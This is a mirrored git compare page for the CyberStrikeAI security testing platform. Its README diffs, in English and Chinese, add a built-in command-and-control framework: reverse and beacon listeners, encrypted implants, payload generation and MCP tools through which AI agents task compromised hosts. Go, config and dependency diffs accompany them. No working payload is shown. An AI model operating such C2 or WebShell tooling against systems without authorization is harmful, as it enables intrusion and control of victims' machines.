mirror of
https://github.com/Ed1s0nZ/CyberStrikeAI.git
synced 2026-05-16 21:23:29 +02:00
Compare commits
134 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| eb47077082 | |||
| f9a482857d | |||
| 679a68b12f | |||
| 840a26c7ef | |||
| 030e69c02d | |||
| d9683cdb44 | |||
| 60a063dd7d | |||
| 5f0c1805a7 | |||
| cb7e66001b | |||
| 4ea838f1d7 | |||
| 573648fc4b | |||
| f0e090abea | |||
| 549dcf518c | |||
| c74e20c54a | |||
| c94a9fd9e9 | |||
| ce9749a8ef | |||
| 145da12017 | |||
| 5111f4c311 | |||
| 8f6384a083 | |||
| 762f778e1e | |||
| 4a11ba8f14 | |||
| 86090af4df | |||
| 2dea6e36bd | |||
| 38ce695708 | |||
| 41fe90faa3 | |||
| 9f54bdb1bf | |||
| 08e727aa41 | |||
| 176c17d630 | |||
| 62710f6619 | |||
| e4dbb96b3e | |||
| 832532213a | |||
| eb04ac0c3a | |||
| 1946508325 | |||
| 89d1c5124f | |||
| 1e7a3299a5 | |||
| cae3a77331 | |||
| 2e1e57ce27 | |||
| 45b6ed2847 | |||
| 88eadf13a4 | |||
| dca5666b18 | |||
| e5d52cdf85 | |||
| 65e48826ff | |||
| 0cff507272 | |||
| 30afd71c05 | |||
| d2b6a154de | |||
| 278d5aa25c | |||
| 215f5a4a93 | |||
| 44185d748d | |||
| fe47f1f058 | |||
| 99ce183f41 | |||
| 2ed1947f36 | |||
| 97f3e8c179 | |||
| 38b0c31b87 | |||
| cb839da4d1 | |||
| 5ed730f17c | |||
| 30b1e5f820 | |||
| 8e5c70703e | |||
| 3cc3b25a7b | |||
| 44cf63fa52 | |||
| 12057c065b | |||
| c4e0b9735c | |||
| 218e9b9880 | |||
| 82d840966e | |||
| c62ff3bde9 | |||
| df2506b651 | |||
| efe9172f85 | |||
| b788bc6dab | |||
| 9134f2bbcb | |||
| d76cf2a162 | |||
| 2f96feb98f | |||
| a374c3950c | |||
| a93e3455fa | |||
| 6cd864c5ca | |||
| e34faff001 | |||
| fa09796ddd | |||
| 1ab7e98f56 | |||
| 0743086873 | |||
| a1ceb9c108 | |||
| 9ddea33dab | |||
| e948940b18 | |||
| 94bbbf87bf | |||
| 4f09ffbaaa | |||
| 6d77081b2b | |||
| 99ccb07ec9 | |||
| 1130fdbfa4 | |||
| 84f4da4d1d | |||
| 34dae98329 | |||
| 3ee7d64b09 | |||
| 22a3aa1531 | |||
| 8ad61906fa | |||
| 487522707f | |||
| fe625010eb | |||
| 40cd0293b5 | |||
| b62dc1f326 | |||
| 6d180c814d | |||
| e68d3a3d23 | |||
| 699b9181e6 | |||
| 7b9070f106 | |||
| 5a31b69245 | |||
| 104a6e30d5 | |||
| 80c4299dbb | |||
| debe967272 | |||
| b28f9c25f8 | |||
| 6f5d0b0174 | |||
| 231a48db8e | |||
| d82ea60827 | |||
| 24a0c813e2 | |||
| 24938f92ff | |||
| b24bc63964 | |||
| 60517fff44 | |||
| d2635eeb9c | |||
| 57ebc7c04b | |||
| b27e443d37 | |||
| 9b4c6dedc8 | |||
| d603060511 | |||
| ad86623dc1 | |||
| 8185539f33 | |||
| 8158b38f48 | |||
| 4fca4a85c2 | |||
| 62c6f3f191 | |||
| dec69a1993 | |||
| 15aab2584a | |||
| 399b697d75 | |||
| e0753fd03e | |||
| 9b1e493023 | |||
| 77d212098d | |||
| 39926007fe | |||
| 0e35506ae1 | |||
| 9ff8bfa44b | |||
| 1d9fcfd87e | |||
| 91cb650234 | |||
| 44e7d3b340 | |||
| 531b05299a | |||
| 0de69a6345 |
@@ -27,7 +27,7 @@ If CyberStrikeAI helps you, you can support the project via **WeChat Pay** or **
|
||||
|
||||
</details>
|
||||
|
||||
CyberStrikeAI is an **AI-native security testing platform** built in Go. It integrates 100+ security tools, an intelligent orchestration engine, role-based testing with predefined security roles, a skills system with specialized testing skills, and comprehensive lifecycle management capabilities. Through native MCP protocol and AI agents, it enables end-to-end automation from conversational commands to vulnerability discovery, attack-chain analysis, knowledge retrieval, and result visualization—delivering an auditable, traceable, and collaborative testing environment for security teams.
|
||||
CyberStrikeAI is an **AI-native security testing platform** built in Go. It integrates 100+ security tools, an intelligent orchestration engine, role-based testing with predefined security roles, a skills system with specialized testing skills, comprehensive lifecycle management capabilities, and a **built-in lightweight C2 (Command & Control) framework** for **authorized** engagements (listeners, encrypted implants, sessions, tasks, real-time events, REST and MCP). Through native MCP protocol and AI agents, it enables end-to-end automation from conversational commands to vulnerability discovery, attack-chain analysis, knowledge retrieval, and result visualization—delivering an auditable, traceable, and collaborative testing environment for security teams.
|
||||
|
||||
|
||||
## Interface & Integration Preview
|
||||
@@ -121,6 +121,7 @@ CyberStrikeAI is an **AI-native security testing platform** built in Go. It inte
|
||||
- 📱 **Chatbot**: DingTalk and Lark (Feishu) long-lived connections so you can talk to CyberStrikeAI from mobile (see [Robot / Chatbot guide](docs/robot_en.md) for setup and commands)
|
||||
- 🧑⚖️ **Human-in-the-loop (HITL)**: Chat sidebar to set approval mode and tool allowlists (listed tools skip approval); global list in `config.yaml` under `hitl.tool_whitelist`; **Apply** can merge new tools into the file and update the running server without restart; dedicated **HITL** page for pending approvals
|
||||
- 🐚 **WebShell management**: Add and manage WebShell connections (e.g. IceSword/AntSword compatible), use a virtual terminal for command execution, a built-in file manager for file operations, and an AI assistant tab that orchestrates tests and keeps per-connection conversation history; supports PHP, ASP, ASPX, JSP and custom shell types with configurable request method and command parameter.
|
||||
- 📡 **Built-in C2**: AI-oriented lightweight command-and-control—**listeners** (TCP reverse, HTTP/HTTPS beacon, WebSocket), **encrypted** beacon channel, **session** and **task** queues with persistence, **payload** helpers (one-liner / build / download), **SSE** live events, REST under `/api/c2/*`, plus unified MCP tools (`c2_listener`, `c2_session`, **`c2_task`**, `c2_task_manage`, `c2_payload`, `c2_event`, `c2_profile`, `c2_file`); optional **HITL** approval for sensitive operations and OPSEC-style controls (e.g. command deny rules). **Authorized testing only.**
|
||||
|
||||
## Plugins
|
||||
|
||||
@@ -210,7 +211,7 @@ go build -o cyberstrike-ai cmd/server/main.go
|
||||
|
||||
**CyberStrikeAI one-click upgrade (recommended):**
|
||||
1. (First time) enable the script: `chmod +x upgrade.sh`
|
||||
2. Upgrade with: `./upgrade.sh` (optional flags: `--tag vX.Y.Z`, `--no-venv`, `--preserve-custom`, `--yes`)
|
||||
2. Upgrade with: `./upgrade.sh` (optional flags: `--tag vX.Y.Z`, `--no-venv`, `--yes`). Local `tools/`, `roles/`, and `skills/` are always preserved.
|
||||
3. The script will back up your `config.yaml` and `data/`, upgrade the code from GitHub Release, update `config.yaml`'s `version`, then restart the server.
|
||||
|
||||
Recommended one-liner:
|
||||
@@ -237,6 +238,7 @@ Requirements / tips:
|
||||
- **Vulnerability management** – Create, update, and track vulnerabilities discovered during testing. Filter by severity (critical/high/medium/low/info), status (open/confirmed/fixed/false_positive), and conversation. View statistics and export findings.
|
||||
- **Batch task management** – Create task queues with multiple tasks, add or edit tasks before execution, and run them sequentially. Each task executes as a separate conversation, with status tracking (pending/running/completed/failed/cancelled) and full execution history.
|
||||
- **WebShell management** – Add and manage WebShell connections (PHP/ASP/ASPX/JSP or custom). Use the virtual terminal to run commands, the file manager to list, read, edit, upload, and delete files, and the AI assistant tab to drive scripted tests with per-connection conversation history. Connections are stored in SQLite; supports GET/POST and configurable command parameter (e.g. IceSword/AntSword style).
|
||||
- **Built-in C2** – Create/start **listeners**, generate **payloads**, track **sessions**, enqueue **tasks**, and subscribe to **events** (SSE) from the Web UI or `/api/c2/*`. Agents and external clients use the C2 MCP tool family (including **`c2_task`**); when HITL is enabled, high-risk tasks can require human approval. Intended **only** for systems you are explicitly authorized to test.
|
||||
- **Settings** – Tweak provider keys, MCP enablement, tool toggles, and agent iteration limits.
|
||||
- **Human-in-the-loop (HITL)** – Sidebar sets mode and allowlisted tools (comma- or newline-separated); global list lives in `config.yaml` under `hitl.tool_whitelist`. **Apply** updates browser/server and can merge new tools into the file (**no restart**). **New chat** keeps sidebar choices; **HITL** nav shows pending approvals. Removing a tool in the sidebar does not remove it from the global list in `config.yaml`—edit the file if needed.
|
||||
|
||||
@@ -320,6 +322,12 @@ Requirements / tips:
|
||||
- **Connectivity test** – Use **Test connectivity** to verify that the shell URL, password, and command parameter are correct before running commands (sends a lightweight `echo 1` check).
|
||||
- **Persistence** – All WebShell connections and AI conversations are stored in SQLite (same database as conversations), so they persist across restarts.
|
||||
|
||||
### Built-in C2 (Command & Control)
|
||||
- **What it is** – A first-party, **AI-native** C2 stack: listeners accept implants (beacons), the server stores **sessions** and **tasks** in SQLite, pushes updates over an **event bus** (including **SSE**), and exposes everything through authenticated **REST** plus MCP.
|
||||
- **Listeners & transports** – `tcp_reverse`, `http_beacon`, `https_beacon`, and `websocket`; per-listener crypto keys; running listeners can be **restored after restart** when marked running in the database.
|
||||
- **Agent integration** – MCP exposes a small **C2 tool family** (listeners, sessions, **`c2_task`**, task management, payloads, events, profiles, files) so the same agent loop can orchestrate C2 alongside other tools; dangerous task types can go through the existing **HITL** bridge when your session policy requires it.
|
||||
- **Safety** – Use **only** in lab or **fully authorized** engagements; combine network isolation, strong auth, and HITL/allowlists as your policy demands.
|
||||
|
||||
### MCP Everywhere
|
||||
- **Web mode** – ships with HTTP MCP server automatically consumed by the UI.
|
||||
- **MCP stdio mode** – `go run cmd/mcp-stdio/main.go` exposes the agent to Cursor/CLI.
|
||||
@@ -476,6 +484,7 @@ A test SSE MCP server is available at `cmd/test-sse-mcp-server/` for validation
|
||||
- **Vulnerability APIs** – manage vulnerabilities via `/api/vulnerabilities` endpoints: `GET /api/vulnerabilities` (list with filters), `POST /api/vulnerabilities` (create), `GET /api/vulnerabilities/:id` (get), `PUT /api/vulnerabilities/:id` (update), `DELETE /api/vulnerabilities/:id` (delete), `GET /api/vulnerabilities/stats` (statistics).
|
||||
- **Batch Task APIs** – manage batch task queues via `/api/batch-tasks` endpoints: `POST /api/batch-tasks` (create queue), `GET /api/batch-tasks` (list queues), `GET /api/batch-tasks/:queueId` (get queue), `POST /api/batch-tasks/:queueId/start` (start execution), `POST /api/batch-tasks/:queueId/cancel` (cancel), `DELETE /api/batch-tasks/:queueId` (delete), `POST /api/batch-tasks/:queueId/tasks` (add task), `PUT /api/batch-tasks/:queueId/tasks/:taskId` (update task), `DELETE /api/batch-tasks/:queueId/tasks/:taskId` (delete task). Tasks execute sequentially, each creating a separate conversation with full status tracking.
|
||||
- **WebShell APIs** – manage WebShell connections and execute commands via `/api/webshell/connections` (GET list, POST create, PUT update, DELETE delete) and `/api/webshell/exec` (command execution), `/api/webshell/fileop` (list/read/write/delete files).
|
||||
- **C2 APIs** – manage listeners, sessions, tasks, payloads, files, and events under `/api/c2/*` (e.g. listeners CRUD/start/stop, session sleep, task create/cancel/wait, payload build/download, event stream).
|
||||
- **Task control** – pause/resume/stop long scans, re-run steps with new params, or stream transcripts.
|
||||
- **Audit & security** – rotate passwords via `/api/auth/change-password`, enforce short-lived sessions, and restrict MCP ports at the network layer when exposing the service.
|
||||
|
||||
@@ -581,7 +590,7 @@ enabled: true
|
||||
```
|
||||
CyberStrikeAI/
|
||||
├── cmd/ # Server, MCP stdio entrypoints, tooling
|
||||
├── internal/ # Agent, MCP core, handlers, security executor
|
||||
├── internal/ # Agent, MCP core, handlers, C2 (`internal/c2`), security executor
|
||||
├── web/ # Static SPA + templates
|
||||
├── tools/ # YAML tool recipes (100+ examples provided)
|
||||
├── roles/ # Role configurations (12+ predefined security testing roles)
|
||||
|
||||
+12
-3
@@ -26,7 +26,7 @@
|
||||
|
||||
</details>
|
||||
|
||||
CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集成了 100+ 安全工具、智能编排引擎、角色化测试与预设安全测试角色、Skills 技能系统与专业测试技能,以及完整的测试生命周期管理能力。通过原生 MCP 协议与 AI 智能体,支持从对话指令到漏洞发现、攻击链分析、知识检索与结果可视化的全流程自动化,为安全团队提供可审计、可追溯、可协作的专业测试环境。
|
||||
CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集成了 100+ 安全工具、智能编排引擎、角色化测试与预设安全测试角色、Skills 技能系统与专业测试技能、完整的测试生命周期管理能力,以及面向 **授权场景** 的 **内置轻量 C2(Command & Control,指挥与控制)** 能力(监听器、加密通信、会话与任务、实时事件、REST 与 MCP 协同)。通过原生 MCP 协议与 AI 智能体,支持从对话指令到漏洞发现、攻击链分析、知识检索与结果可视化的全流程自动化,为安全团队提供可审计、可追溯、可协作的专业测试环境。
|
||||
|
||||
|
||||
## 界面与集成预览
|
||||
@@ -120,6 +120,7 @@ CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集
|
||||
- 📱 **机器人**:支持钉钉、飞书长连接,在手机端与 CyberStrikeAI 对话(配置与命令详见 [机器人使用说明](docs/robot.md))
|
||||
- 🧑⚖️ **人机协同(HITL)**:对话页侧栏配置协同模式与免审批工具白名单;全局列表在 `config.yaml` 的 `hitl.tool_whitelist`;点「应用」可将新增工具合并写入配置文件且**无需重启**即可生效;导航 **人机协同** 页处理待审批工具调用
|
||||
- 🐚 **WebShell 管理**:添加与管理 WebShell 连接(兼容冰蝎/蚁剑等),通过虚拟终端执行命令、内置文件管理进行文件操作,并提供按连接维度保存历史的 AI 助手标签页;支持 PHP/ASP/ASPX/JSP 及自定义类型,可配置请求方法与命令参数。
|
||||
- 📡 **内置 C2**:面向 AI 协同的轻量 **C2**——**多种监听器**(TCP 反向、HTTP/HTTPS Beacon、WebSocket)、**加密** Beacon 信道、**会话与任务**队列及持久化、**Payload** 辅助(一键命令 / 构建 / 下载)、**SSE** 实时事件、REST(`/api/c2/*`)及智能体侧 **一组 C2 MCP 工具**(如 `c2_listener`、`c2_session`、**`c2_task`**、`c2_task_manage`、`c2_payload`、`c2_event`、`c2_profile`、`c2_file`);敏感操作可对接 **人机协同(HITL)**,并支持 OPSEC 类规则(如命令拒绝正则)。**仅限授权测试。**
|
||||
|
||||
## 插件(Plugins)
|
||||
|
||||
@@ -208,7 +209,7 @@ go build -o cyberstrike-ai cmd/server/main.go
|
||||
### CyberStrikeAI 版本更新(无兼容性问题)
|
||||
|
||||
1. (首次使用)启用脚本:`chmod +x upgrade.sh`
|
||||
2. 一键升级:`./upgrade.sh`(可选参数:`--tag vX.Y.Z`、`--no-venv`、`--preserve-custom`、`--yes`)
|
||||
2. 一键升级:`./upgrade.sh`(可选参数:`--tag vX.Y.Z`、`--no-venv`、`--yes`)。本地的 `tools/`、`roles/`、`skills/` 会始终保留不被覆盖。
|
||||
3. 脚本会备份你的 `config.yaml` 和 `data/`,从 GitHub Release 升级代码,更新 `config.yaml` 的 `version` 字段后重启服务。
|
||||
|
||||
推荐的一键指令:
|
||||
@@ -235,6 +236,7 @@ go build -o cyberstrike-ai cmd/server/main.go
|
||||
- **漏洞管理**:在测试过程中创建、更新和跟踪发现的漏洞。支持按严重程度(严重/高/中/低/信息)、状态(待确认/已确认/已修复/误报)和对话进行过滤,查看统计信息并导出发现。
|
||||
- **批量任务管理**:创建任务队列,批量添加多个任务,执行前可编辑或删除任务,然后依次顺序执行。每个任务会作为独立对话执行,支持完整的状态跟踪(待执行/执行中/已完成/失败/已取消)和执行历史。
|
||||
- **WebShell 管理**:添加并管理 WebShell 连接(PHP/ASP/ASPX/JSP 或自定义类型)。使用虚拟终端执行命令(带命令历史与快捷命令),使用文件管理浏览、读取、编辑、上传与删除目标文件,并支持按路径导航和名称过滤。连接信息持久化存储于 SQLite,支持 GET/POST 及可配置命令参数(兼容冰蝎/蚁剑等)。
|
||||
- **内置 C2**:在 Web 界面或 `/api/c2/*` 创建/启动 **监听器**、生成 **Payload**、查看 **会话**、下发 **任务** 并订阅 **事件(SSE)**。智能体与外部客户端通过 **C2 MCP 工具族**(含 **`c2_task`** 等)编排;开启人机协同时,高风险任务可走审批。**仅用于已获明确授权的目标。**
|
||||
- **可视化配置**:在界面中切换模型、启停工具、设置迭代次数等。
|
||||
- **人机协同(HITL)**:侧栏设置协同模式与免审批工具(逗号或换行);全局白名单见 `config.yaml` 的 `hitl.tool_whitelist`。点「**应用**」可写浏览器/服务端并合并新增工具进配置(**无需重启**)。**新对话**保留侧栏选择;导航 **人机协同** 处理待审批。从侧栏删掉工具不会自动从配置文件移除全局项,需手改 `config.yaml`。
|
||||
|
||||
@@ -317,6 +319,12 @@ go build -o cyberstrike-ai cmd/server/main.go
|
||||
- **连通性测试**:使用 **测试连通性** 可在执行命令前通过一次 `echo 1` 调用校验 Shell 地址、密码与命令参数是否正确。
|
||||
- **持久化**:所有 WebShell 连接与相关 AI 会话均保存在 SQLite(与对话共用数据库),服务重启后仍可继续使用。
|
||||
|
||||
### 内置 C2(Command & Control)
|
||||
- **定位**:平台内置的 **AI 原生** C2 能力栈——监听器接入植入体(Beacon),服务端以 SQLite 持久化 **会话** 与 **任务**,通过 **事件总线** 推送变更(含 **SSE**),并由鉴权后的 **REST** 与 MCP 统一对外。
|
||||
- **监听器与传输**:支持 `tcp_reverse`、`http_beacon`、`https_beacon`、`websocket`;按监听器独立密钥;数据库中标记为运行中的监听器可在 **服务重启后尝试恢复**。
|
||||
- **与智能体联动**:通过 **`c2_task` 等 C2 MCP 工具** 与现有对话/多代理工具链协同;在会话策略需要时,危险任务类型可走既有 **人机协同(HITL)** 审批流。
|
||||
- **安全提示**:**仅**在实验环境或 **已获完整书面授权** 的对抗演练中使用;结合网络隔离、强鉴权及 HITL/白名单等策略管控风险。
|
||||
|
||||
### MCP 全场景
|
||||
- **Web 模式**:自带 HTTP MCP 服务供前端调用。
|
||||
- **MCP stdio 模式**:`go run cmd/mcp-stdio/main.go` 可接入 Cursor/命令行。
|
||||
@@ -474,6 +482,7 @@ CyberStrikeAI 支持通过三种传输模式连接外部 MCP 服务器:
|
||||
- **漏洞管理 API**:通过 `/api/vulnerabilities` 端点管理漏洞:`GET /api/vulnerabilities`(列表,支持过滤)、`POST /api/vulnerabilities`(创建)、`GET /api/vulnerabilities/:id`(获取)、`PUT /api/vulnerabilities/:id`(更新)、`DELETE /api/vulnerabilities/:id`(删除)、`GET /api/vulnerabilities/stats`(统计)。
|
||||
- **批量任务 API**:通过 `/api/batch-tasks` 端点管理批量任务队列:`POST /api/batch-tasks`(创建队列)、`GET /api/batch-tasks`(列表)、`GET /api/batch-tasks/:queueId`(获取队列)、`POST /api/batch-tasks/:queueId/start`(开始执行)、`POST /api/batch-tasks/:queueId/cancel`(取消)、`DELETE /api/batch-tasks/:queueId`(删除队列)、`POST /api/batch-tasks/:queueId/tasks`(添加任务)、`PUT /api/batch-tasks/:queueId/tasks/:taskId`(更新任务)、`DELETE /api/batch-tasks/:queueId/tasks/:taskId`(删除任务)。任务依次顺序执行,每个任务创建独立对话,支持完整状态跟踪。
|
||||
- **WebShell API**:通过 `/api/webshell/connections`(GET 列表、POST 创建、PUT 更新、DELETE 删除)及 `/api/webshell/exec`(执行命令)、`/api/webshell/fileop`(列出/读取/写入/删除文件)管理 WebShell 连接与执行操作。
|
||||
- **C2 API**:在 `/api/c2/*` 管理监听器、会话、任务、Payload、文件与事件(如监听器增删改查/启停、会话休眠、任务创建/取消/等待、Payload 构建/下载、事件流等)。
|
||||
- **任务控制**:支持暂停/终止长任务、修改参数后重跑、流式获取日志。
|
||||
- **安全管理**:`/api/auth/change-password` 可即时轮换口令;建议在暴露 MCP 端口时配合网络层 ACL。
|
||||
|
||||
@@ -579,7 +588,7 @@ enabled: true
|
||||
```
|
||||
CyberStrikeAI/
|
||||
├── cmd/ # Web 服务、MCP stdio 入口及辅助工具
|
||||
├── internal/ # Agent、MCP 核心、路由与执行器
|
||||
├── internal/ # Agent、MCP 核心、路由、C2(`internal/c2`)与执行器
|
||||
├── web/ # 前端静态资源与模板
|
||||
├── tools/ # YAML 工具目录(含 100+ 示例)
|
||||
├── roles/ # 角色配置文件目录(含 12+ 预设安全测试角色)
|
||||
|
||||
@@ -5,6 +5,7 @@ import (
|
||||
"cyberstrike-ai/internal/logger"
|
||||
"cyberstrike-ai/internal/mcp"
|
||||
"cyberstrike-ai/internal/security"
|
||||
"cyberstrike-ai/internal/storage"
|
||||
"flag"
|
||||
"fmt"
|
||||
"os"
|
||||
@@ -32,6 +33,23 @@ func main() {
|
||||
// 创建安全工具执行器
|
||||
executor := security.NewExecutor(&cfg.Security, mcpServer, log.Logger)
|
||||
|
||||
// 初始化结果存储(与 internal/app/app.go 同样的逻辑)。
|
||||
// stdio 模式下原本不初始化,导致 'exec' 等查询型工具报"结果存储未初始化"。
|
||||
resultStorageDir := "tmp"
|
||||
if cfg.Agent.ResultStorageDir != "" {
|
||||
resultStorageDir = cfg.Agent.ResultStorageDir
|
||||
}
|
||||
if err := os.MkdirAll(resultStorageDir, 0755); err != nil {
|
||||
fmt.Fprintf(os.Stderr, "创建结果存储目录失败: %v\n", err)
|
||||
os.Exit(1)
|
||||
}
|
||||
resultStorage, err := storage.NewFileResultStorage(resultStorageDir, log.Logger)
|
||||
if err != nil {
|
||||
fmt.Fprintf(os.Stderr, "初始化结果存储失败: %v\n", err)
|
||||
os.Exit(1)
|
||||
}
|
||||
executor.SetResultStorage(resultStorage)
|
||||
|
||||
// 注册工具
|
||||
executor.RegisterTools(mcpServer)
|
||||
|
||||
|
||||
+28
-3
@@ -10,7 +10,7 @@
|
||||
# ============================================
|
||||
|
||||
# 前端显示的版本号(可选,不填则显示默认版本)
|
||||
version: "v1.5.15"
|
||||
version: "v1.6.12"
|
||||
# 服务器配置
|
||||
server:
|
||||
host: 0.0.0.0 # 监听地址,0.0.0.0 表示监听所有网络接口
|
||||
@@ -41,6 +41,13 @@ openai:
|
||||
api_key: sk-xxxxxxx # API 密钥(必填)
|
||||
model: qwen3-max # 模型名称(必填)
|
||||
max_total_tokens: 120000 # LLM 相关上下文的最大 Token 数限制(内存压缩和攻击链构建会共用此配置)
|
||||
# Eino 路径模型推理:DeepSeek/OpenAI 为 thinking / reasoning_effort 等;provider 为 claude 时合并为 Anthropic 顶层 thinking(extended thinking),mode: off 关闭
|
||||
reasoning:
|
||||
mode: off # auto | on | off;off 时不附加任何推理扩展字段
|
||||
effort: max # low | medium | high | max;空表示不指定(openai_compat 下 auto 且无强度时不发请求扩展)
|
||||
allow_client_reasoning: true # false 时忽略对话请求体 reasoning,仅以下方为准
|
||||
profile: openai_compat # auto | deepseek_compat | openai_compat | output_config_effort
|
||||
# extra_request_fields: {} # 可选:管理员自定义根级 JSON 片段(高级)
|
||||
# ============================================
|
||||
# 信息收集(FOFA)配置(可选)
|
||||
# ============================================
|
||||
@@ -53,10 +60,10 @@ fofa:
|
||||
# Agent 配置
|
||||
# 达到最大迭代次数时,AI 会自动总结测试结果
|
||||
agent:
|
||||
max_iterations: 120 # 最大迭代次数,AI 代理最多执行多少轮工具调用
|
||||
max_iterations: 1200 # 最大迭代次数,AI 代理最多执行多少轮工具调用
|
||||
large_result_threshold: 102400 # 大结果阈值(字节),默认50KB,超过此大小会自动保存到存储
|
||||
result_storage_dir: tmp # 结果存储目录,大结果会保存在此目录下
|
||||
tool_timeout_minutes: 30 # 单次工具执行最大时长(分钟),超时自动终止;0 表示不限制(不推荐,易出现长时间挂起)
|
||||
tool_timeout_minutes: 60 # 单次工具执行最大时长(分钟),超时自动终止;0 表示不限制(不推荐,易出现长时间挂起)
|
||||
# system_prompt_path: prompts/single-react.md # 可选:单代理系统提示文件(相对本配置文件所在目录);非空且可读时替换内置提示
|
||||
# 人机协同(HITL)全局白名单:此处列出的工具始终免审批,与对话页「白名单工具(免审批,逗号分隔)」合并为并集;侧栏「应用」可合并写入本列表并立即生效。
|
||||
hitl:
|
||||
@@ -110,6 +117,21 @@ multi_agent:
|
||||
deep_output_key: "" # 非空:将最终助手输出写入 adk session 的键名(Deep 与 Supervisor 主代理);空表示不写入
|
||||
deep_model_retry_max_retries: 0 # >0:ChatModel 调用失败时的框架级最大重试次数(Deep 与 Supervisor 主);0:不重试
|
||||
task_tool_description_prefix: "" # 非空:仅 Deep 的 task 工具使用自定义描述前缀,运行时会拼接子代理名称;空则走 Eino 默认生成逻辑
|
||||
# Eino callbacks + OpenTelemetry:框架级 span(与 Zap 对齐);默认不向终端用户 UI 推 eino_trace_*(见 sse_trace_to_client)
|
||||
eino_callbacks:
|
||||
enabled: true
|
||||
# log_only=仅 Zap+OTel(推荐默认)| sse/full=才启用流式回调副本关闭等(full 含 stream hooks)
|
||||
mode: log_only
|
||||
sse_trace_to_client: false # true:且 mode 为 sse/full 时,向前端时间线推送 eino_trace_*(排障/内网演示用)
|
||||
max_input_summary_runes: 400
|
||||
max_output_summary_runes: 400
|
||||
zap_verbose: false # true:Debug 附带 input/output 摘要
|
||||
otel:
|
||||
enabled: true
|
||||
service_name: cyberstrike-ai
|
||||
exporter: stdout # none | stdout(开发/本机)| otlphttp(生产接 Collector)
|
||||
otlp_endpoint: localhost:4318 # otlphttp 时使用,host:port,路径固定 /v1/traces
|
||||
sample_ratio: 1.0 # 0~1,ParentBased+TraceIDRatio
|
||||
# 数据库配置
|
||||
database:
|
||||
path: data/conversations.db # SQLite 数据库文件路径,用于存储对话历史和消息
|
||||
@@ -147,6 +169,9 @@ mcp:
|
||||
# 外部 MCP 配置
|
||||
external_mcp:
|
||||
servers: {}
|
||||
# 内置 C2:本机仅做对话/知识库时可设为 false,不启动监听器、不注册 C2 MCP 工具;省略本段时默认启用
|
||||
c2:
|
||||
enabled: true
|
||||
# ============================================
|
||||
# 知识库相关配置
|
||||
# ============================================
|
||||
|
||||
@@ -9,13 +9,13 @@ toolchain go1.24.4
|
||||
|
||||
require (
|
||||
github.com/bytedance/sonic v1.15.0
|
||||
github.com/cloudwego/eino v0.8.8
|
||||
github.com/cloudwego/eino v0.8.13
|
||||
github.com/cloudwego/eino-ext/adk/backend/local v0.0.0-20260416081055-0ebab92e14f2
|
||||
github.com/cloudwego/eino-ext/components/document/loader/file v0.0.0-20260416081055-0ebab92e14f2
|
||||
github.com/cloudwego/eino-ext/components/document/transformer/splitter/markdown v0.0.0-20260416081055-0ebab92e14f2
|
||||
github.com/cloudwego/eino-ext/components/document/transformer/splitter/recursive v0.0.0-20260416081055-0ebab92e14f2
|
||||
github.com/cloudwego/eino-ext/components/embedding/openai v0.0.0-20260416081055-0ebab92e14f2
|
||||
github.com/cloudwego/eino-ext/components/model/openai v0.1.12
|
||||
github.com/cloudwego/eino-ext/components/document/loader/file v0.0.0-20260427010451-749e3706378b
|
||||
github.com/cloudwego/eino-ext/components/document/transformer/splitter/markdown v0.0.0-20260427010451-749e3706378b
|
||||
github.com/cloudwego/eino-ext/components/document/transformer/splitter/recursive v0.0.0-20260427010451-749e3706378b
|
||||
github.com/cloudwego/eino-ext/components/embedding/openai v0.0.0-20260427010451-749e3706378b
|
||||
github.com/cloudwego/eino-ext/components/model/openai v0.1.13
|
||||
github.com/creack/pty v1.1.24
|
||||
github.com/eino-contrib/jsonschema v1.0.3
|
||||
github.com/gin-gonic/gin v1.9.1
|
||||
@@ -27,7 +27,13 @@ require (
|
||||
github.com/open-dingtalk/dingtalk-stream-sdk-go v0.9.1
|
||||
github.com/pkoukk/tiktoken-go v0.1.8
|
||||
github.com/robfig/cron/v3 v3.0.1
|
||||
go.opentelemetry.io/otel v1.34.0
|
||||
go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp v1.34.0
|
||||
go.opentelemetry.io/otel/exporters/stdout/stdouttrace v1.34.0
|
||||
go.opentelemetry.io/otel/sdk v1.34.0
|
||||
go.opentelemetry.io/otel/trace v1.34.0
|
||||
go.uber.org/zap v1.26.0
|
||||
golang.org/x/text v0.26.0
|
||||
golang.org/x/time v0.14.0
|
||||
gopkg.in/yaml.v3 v3.0.1
|
||||
)
|
||||
@@ -38,13 +44,16 @@ require (
|
||||
github.com/buger/jsonparser v1.1.1 // indirect
|
||||
github.com/bytedance/gopkg v0.1.3 // indirect
|
||||
github.com/bytedance/sonic/loader v0.5.0 // indirect
|
||||
github.com/cenkalti/backoff/v4 v4.3.0 // indirect
|
||||
github.com/cloudwego/base64x v0.1.6 // indirect
|
||||
github.com/cloudwego/eino-ext/libs/acl/openai v0.1.16 // indirect
|
||||
github.com/cloudwego/eino-ext/libs/acl/openai v0.1.17 // indirect
|
||||
github.com/dlclark/regexp2 v1.10.0 // indirect
|
||||
github.com/dustin/go-humanize v1.0.1 // indirect
|
||||
github.com/evanphx/json-patch v0.5.2 // indirect
|
||||
github.com/gabriel-vasile/mimetype v1.4.2 // indirect
|
||||
github.com/gin-contrib/sse v0.1.0 // indirect
|
||||
github.com/go-logr/logr v1.4.2 // indirect
|
||||
github.com/go-logr/stdr v1.2.2 // indirect
|
||||
github.com/go-playground/locales v0.14.1 // indirect
|
||||
github.com/go-playground/universal-translator v0.18.1 // indirect
|
||||
github.com/go-playground/validator/v10 v10.14.0 // indirect
|
||||
@@ -52,6 +61,7 @@ require (
|
||||
github.com/gogo/protobuf v1.3.2 // indirect
|
||||
github.com/google/jsonschema-go v0.3.0 // indirect
|
||||
github.com/goph/emperror v0.17.2 // indirect
|
||||
github.com/grpc-ecosystem/grpc-gateway/v2 v2.25.1 // indirect
|
||||
github.com/json-iterator/go v1.1.12 // indirect
|
||||
github.com/klauspost/cpuid/v2 v2.2.10 // indirect
|
||||
github.com/leodido/go-urn v1.2.4 // indirect
|
||||
@@ -70,15 +80,21 @@ require (
|
||||
github.com/wk8/go-ordered-map/v2 v2.1.8 // indirect
|
||||
github.com/yargevad/filepathx v1.0.0 // indirect
|
||||
github.com/yosida95/uritemplate/v3 v3.0.2 // indirect
|
||||
go.opentelemetry.io/auto/sdk v1.1.0 // indirect
|
||||
